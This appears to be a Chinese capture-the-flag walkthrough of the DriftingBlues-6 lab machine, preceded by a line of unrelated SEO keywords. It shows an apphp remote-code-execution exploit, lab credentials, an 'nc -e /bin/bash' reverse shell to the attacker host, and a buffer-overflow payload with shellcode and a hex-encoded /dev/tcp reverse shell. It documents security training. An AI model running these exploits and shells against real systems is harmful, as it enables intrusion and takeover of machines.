网站商品台管理系统,潍坊网站制作软件,成立公司的条件,怎么做二维码网站前言
靶机#xff1a;DriftingBlues-6#xff0c;IP地址192.168.1.66
攻击#xff1a;kali#xff0c;IP地址192.168.1.16
都采用虚拟机#xff0c;网卡为桥接模式
主机发现
使用arp-scan -l或netdiscover -r 192.168.1.1/24 信息收集
使用nmap扫描端口 网站探测
访…前言
靶机DriftingBlues-6IP地址192.168.1.66
攻击kaliIP地址192.168.1.16
都采用虚拟机网卡为桥接模式
主机发现
使用arp-scan -l或netdiscover -r 192.168.1.1/24 信息收集
使用nmap扫描端口 网站探测
访问80端口这或许就是CMS 使用whatweb探测
whatweb http://192.168.1.66使用gobuster、ffuf、dirsearch、dirb、dirbuster等工具进行目录爆破
gobuster dir -u http://192.168.1.66 -w /usr/share/wordlists/dirb/big.txt -x zip,php,txt,md,html,jpg -d -b 404,403访问README.txt确定CMS及版本 漏洞寻找
访问一圈扫描到的目录没发现有什么信息使用searchsploit测试有无对应版本的历史漏洞
searchsploit apphp有一个远程代码执行的py脚本尝试使用该脚本进行测试注意这里需要的是python2的环境
locate 33070.py
cp /usr/share/exploitdb/exploits/php/webapps/33070.py ./
chmod x 33070.pypython2 33070.py http://192.168.1.66/index.php漏洞利用
该脚本首先会进行测试如phpinfo信息等用法
Usage: python 33070.py http://target/blog/index.php执行脚本后发现测试出一个php文件中的信息这个脚本直接通过浏览器访问是没有任何信息但是这里就可以发现
用户名clapton和密码yaraklitepe 测试命令是否能被执行发现确实可以 靶机内信息收集
查看靶机内的用户 为了后续方便还是获取一个终端为好不过这里只是命令执行所以需要进行反弹shell。
我这里是测试发现直接使用bash反弹不成功然后使用的nc当然反弹的方法很多https://forum.ywhack.com/shell.php
#kali开启监听
nc -lvvp 9999#靶机把bash反弹
nc -e /bin/bash 192.168.1.16 9999然后使用python获取一个终端注意这里是python2因为之前使用命令测试安装的版本
dpkg -l | grep python
或者
compgen -c | grep python //靶机没有这个命令既然有用户clapton与前面收集的连接数据库的一样了测试是否一码多用成功 返回其主目录查看发现一个SUID的文件剩下的两个一个flag一个内容说缓冲区溢出是这个方法 使用file知道是可执行文件但是无法知道其内容使用python开启简易的http然后下载到kali中
这里因为python是2.x版本所以与3.x开启不一样
python -m SimpleHTTPServe 9999使用strings也没发现调用命令等不过发现一些信息收集一下 缓冲区溢出提取
之前查看note时提示缓冲区溢出那么进行处理。
我这里之前因为打过哈利波特的一个靶场涉及到缓冲区溢出所以大概知道流程
首先需要关闭kali中的alsr功能
alsr是内存地址随机化的安全技术如若不关闭会导致内存地址一直变化无法确定关键点缓存溢出的位置
cd /proc/sys/kernel
echo 0 randomize_va_space可以使用edb-debugger安装即可或使用gdb
输入命令edb打开图形化界面进行调试
首先把可执行文件加入到调试器中然后选择打开input然后上传多个A进行测试看是否存在溢出这里生成300个A测试
打开input文件然后把生成的字符写入 然后进行执行调试发现最终提示溢出 可以看到EIP和ESP都是AEIP是进行跳转执行指令地址的ESP是指令寄存处 那么这时候测试其偏移量为多少使用msf生成无规律的字符
msf-pattern_create -l 600然后把这一串字符复制与上面一样在打开文件时写入 再使用msf查看这个字符所处的位置
msf-pattern_offset -l 600 -q 41376641OK确定偏移量为171那么从172开始的四个字符就是EIP的地址也是需要重点关注的并且再测试确实后面跟着的就是ESP中的内容。
下面就是需要寻找到ESP的地址方便在覆盖EIP时确保地址是ESP的地址这么就可以在ESP中写入反弹命令
不过这里一直使用的图形化界面edb也要使用gdb毕竟有些时候条件有限所以这个工具也要会用 这里可以在kali中继续测试不过我这里为了省时间在靶机内测试因为靶机内可以使用gdb并且如果在kali中处理还有一些环境问题需要解决。 下面在靶机内使用gdb测试因为已经知道偏移量等这里直接获取ESP地址
gdb input
(gdb)r $(python -c print(A*300))
(gdb)x/s $esp获取到地址0xbfae41b0这时候就可以进行构造payload因为这里是小端序字节所以地址需要倒写\xb0\x41\xae\xbf
$(python -c print(A*171\xb0\x41\xae\xbf\x62\x61\x73\x68\x20\x2d\x63\x20\x27\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x36\x2f\x38\x38\x38\x38\x20\x30\x3e\x26\x31\x27))再次构造后把上面的语句进行测试可以看到确实是小端序吧并且发现ESP地址改变说明靶机内的alsr是开启的地址就会动态变化 那就不可能一次就中说明这里可能需要多次那么就写一个循环注意这里是一行也就是可以直接输入如要多行可能需要用到EOF等
但是这里的脚本还是不行测试发现使用msfvenom生成的是反弹shell并非是其缓冲区溢出这个个人不是很熟悉所以借取网上的wp代码这样的不过这段代码我是不理解其含义后续再学习\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80
结合前面的把循环加上就是这样的构造这里的ESP地址改变是因为测试几遍后重新获取的
for i in {1..10000}; do (./input $(python -c print(A*171\x70\x3f\xf8\xbf\x90*32 \x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80))); done直接在终端运行等待一会提取成功 总结
考察对于一些CMS的历史漏洞寻找并利用考察对于缓冲区溢出的掌握以及ESP、EIP偏移量等
